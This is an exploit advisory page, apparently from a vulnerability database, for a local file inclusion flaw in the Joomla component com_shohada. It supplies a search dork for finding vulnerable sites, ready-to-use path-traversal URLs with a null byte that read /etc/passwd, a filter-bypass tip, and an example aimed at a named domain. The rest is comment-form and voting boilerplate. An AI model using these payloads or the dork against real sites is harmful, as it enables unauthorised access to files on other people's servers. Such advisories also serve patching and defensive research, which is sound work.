Joomla Component com_shohada Local File Inclusion

2013.05.12

Credit: AtT4CKxT3rR0r1ST

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:\"com_shohada\"

Joomla Component com_shohada Local File Inclusion
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_shohada"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/index.php?option=com_shohada&controller=[LFI]
www.site.com/index.php?option=com_shohada&controller=../../../../../../../../../../etc/passwd%00
 
Example:
To Bypass Filter Type:/etc/passwd%00..........
gorgab.com/index.php?option=com_shohada&controller=../../../../../../../../../../etc/passwd%00
####################################################################
 

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_shohada Local File Inclusion

Dork: inurl:\"com_shohada\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.